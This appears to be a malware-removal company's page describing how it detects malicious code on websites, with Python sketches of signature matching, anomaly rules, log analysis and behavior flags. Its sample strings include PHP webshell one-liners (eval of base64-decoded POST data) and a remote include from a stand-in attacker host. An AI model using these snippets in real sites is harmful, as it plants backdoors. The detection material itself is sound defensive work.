Contrary to what others say, we don't "just run some script" to find and remove website malware.

We use many methods because our opponents (the cybercriminals) have many ways to hide their malware.

Our methods

Since we've cleaned over 1,000,000 websites, we've collected many files that have been positively identified as malicious. We create signatures, much like your anti-malware program does on your local computer, to positively identify malware in other infected website files.

Our signatures are broad-based rather than hash-based. We take into account the fact that hackers may add extra spaces throughout their code to evade detection by many other programs. There are many other "tricks" hackers use to hide their infectious code - but we find them all. We start with signatures because our database can identify 90% of website malware with this method alone.

This broad-based approach allows us to use fewer rules without sacrificing an ounce of accuracy. It actually increases our accuracy: if one group of hackers uses one variable name and a different group uses a different variable name in basically the same code, our system will positively identify both.
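To illustrate why a broad signature can catch variants that a hash would miss, here is a minimal sketch in Python. It is not our production engine: the `normalize` function, the `SIGNATURE` pattern, and the sample PHP snippets are all hypothetical and chosen only to show the idea of ignoring whitespace and variable names before matching.

```python
import re

# Hypothetical signature: request data is stored in a variable,
# then base64-decoded and passed to eval().
SIGNATURE = re.compile(
    r"\$VAR=\$_(?:POST|GET|REQUEST|COOKIE)\[[^\]]*\];"
    r"eval\(base64_decode\(\$VAR\)\)"
)

def normalize(source: str) -> str:
    """Strip the cosmetic differences that defeat hash-based matching."""
    # Remove all whitespace, so padding with spaces or newlines has no effect.
    compact = re.sub(r"\s+", "", source)
    # Replace user-chosen variable names with a placeholder.
    # PHP superglobals such as $_POST are left untouched.
    return re.sub(r"\$(?!_[A-Z])[A-Za-z_]\w*", "$VAR", compact)

def matches_signature(source: str) -> bool:
    return SIGNATURE.search(normalize(source)) is not None

# Two variants of the same code: different spacing, different variable name.
variant_a = "<?php $x = $_POST['a'];   eval( base64_decode( $x ) ); ?>"
variant_b = '<?php\n$payload=$_REQUEST["k"];\neval(base64_decode(\t$payload));'
benign = "<?php echo base64_decode($data); ?>"

print(matches_signature(variant_a), matches_signature(variant_b),
      matches_signature(benign))
```

A hash of `variant_a` and `variant_b` would differ, so a hash-based scanner would need one rule per variant, while the single pattern above covers both.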

The signature database is generally updated numerous times a day. Our VPS and Dedicated software receives new signatures once every hour.

Anomaly detection involves setting a baseline standard for what is considered normal and what is considered abnormal. Anything determined to be abnormal is analyzed further. If it's malicious or potentially malicious, it's removed.

One basic example is finding a PHP file in the images folder. It probably doesn't belong there - but it might. Files in an images folder that are not detected by our first-line scanner are analyzed further. Another example is finding a file with WordPress code in it on a website that was created with Joomla. Could it be legitimate? Possibly. Our systems will determine that for sure.
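The images-folder example can be sketched as a simple baseline rule in Python. This is an illustration only: the folder names in `MEDIA_DIRS`, the extensions in `SCRIPT_EXTS`, and the function name `is_anomalous` are assumptions, and a hit means "analyze further", not "malicious".

```python
from pathlib import PurePosixPath

# Hypothetical baseline: folders that normally hold only media files.
MEDIA_DIRS = {"images", "img", "uploads", "media"}
# Hypothetical list of extensions a web server may execute as PHP.
SCRIPT_EXTS = {".php", ".phtml", ".php5", ".phar"}

def is_anomalous(path: str) -> bool:
    """Return True when a script file sits inside a media folder."""
    p = PurePosixPath(path.lower())
    # Look only at the directory components, not the file name itself.
    in_media_dir = any(part in MEDIA_DIRS for part in p.parts[:-1])
    return in_media_dir and p.suffix in SCRIPT_EXTS

for candidate in ["wp-content/uploads/2020/logo.php",
                  "images/logo.png",
                  "includes/images.php"]:
    print(candidate, is_anomalous(candidate))
```

Only the first path is flagged: the second is an ordinary image, and the third is a script that merely has "images" in its file name.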

This engine has many rules and is constantly being updated, though not as frequently as the signatures, because of the variety of rules already in use.

Our anomaly detection engine is also where our log file analysis occurs. Not all hosting providers make the log files accessible, but those that do make our job much easier. We've learned which patterns of traffic are normal and which are not. Any abnormal traffic is traced to see which files are being targeted. This can lead us to previously unknown backdoor shell scripts that the hackers have uploaded.
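As a rough illustration of tracing abnormal traffic back to files, the Python sketch below reads access log lines and lists PHP files that were only ever requested with POST. That heuristic is an assumption made for this example, not a description of our actual rules, and the log lines and the name `post_only_scripts` are made up. It assumes the common access log layout in which the request appears in quotes followed by the status code.

```python
import re
from collections import defaultdict

# Matches the quoted request and the status code of an access log line.
LOG_LINE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

def post_only_scripts(lines):
    """Return PHP paths that answered 200 and were only requested via POST."""
    methods_by_path = defaultdict(set)
    for line in lines:
        m = LOG_LINE.search(line)
        if m is None or m["status"] != "200":
            continue
        path = m["path"].split("?", 1)[0]  # drop the query string
        if path.endswith(".php"):
            methods_by_path[path].add(m["method"])
    return sorted(p for p, seen in methods_by_path.items() if seen == {"POST"})

# Made-up sample log lines for illustration.
sample_log = [
    '1.2.3.4 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 512',
    '1.2.3.4 - - [10/Oct/2023:13:55:40 +0000] "POST /index.php HTTP/1.1" 200 512',
    '5.6.7.8 - - [10/Oct/2023:14:01:02 +0000] "POST /images/x.php?c=1 HTTP/1.1" 200 20',
    '5.6.7.8 - - [10/Oct/2023:14:01:09 +0000] "POST /missing.php HTTP/1.1" 404 0',
]

print(post_only_scripts(sample_log))
```

Here `/images/x.php` stands out because nobody ever browses to it normally, which makes it a candidate for closer inspection.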

Behavior analysis (BA) involves examining code that passes the first two tests (signatures and anomaly detection). Here our system analyzes the code itself, looking for suspicious behavior.

Our BA engine looks for code that would allow uploading files to the site, or calling a program snippet from another site. These behaviors, and more, are flagged by this engine.
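The two behaviors mentioned above can be sketched as a small static check in Python. This is a simplified illustration, not our BA engine: the `BEHAVIORS` table and the function name `flag_behaviors` are hypothetical, and pattern matching on source text is only a stand-in for real code analysis. The PHP functions it looks for (`move_uploaded_file`, `include`, `require`, `file_get_contents`, `fopen`) are standard PHP.

```python
import re

# Hypothetical behavior rules: what the code can do, not what it looks like.
BEHAVIORS = {
    "file upload": re.compile(r"\bmove_uploaded_file\s*\(", re.I),
    "remote include": re.compile(
        r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]https?://", re.I),
    "remote fetch": re.compile(
        r"\b(?:file_get_contents|fopen)\s*\(\s*['\"]https?://", re.I),
}

def flag_behaviors(source: str) -> list:
    """Return the names of suspicious behaviors found in PHP source text."""
    return [name for name, pattern in BEHAVIORS.items()
            if pattern.search(source)]

# Made-up sample that stores an uploaded file and pulls code from another site.
suspicious = (
    "<?php move_uploaded_file($_FILES['f']['tmp_name'], 'x.php'); "
    "include('http://evil.example/a.txt'); ?>"
)
harmless = "<?php echo 'hello'; ?>"

print(flag_behaviors(suspicious))
print(flag_behaviors(harmless))
```

A flag here is a prompt for further review, since plenty of legitimate code also accepts uploads or fetches remote content.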

It's the final step in our analysis and provides some insight, but it produces the fewest detections of all our processes.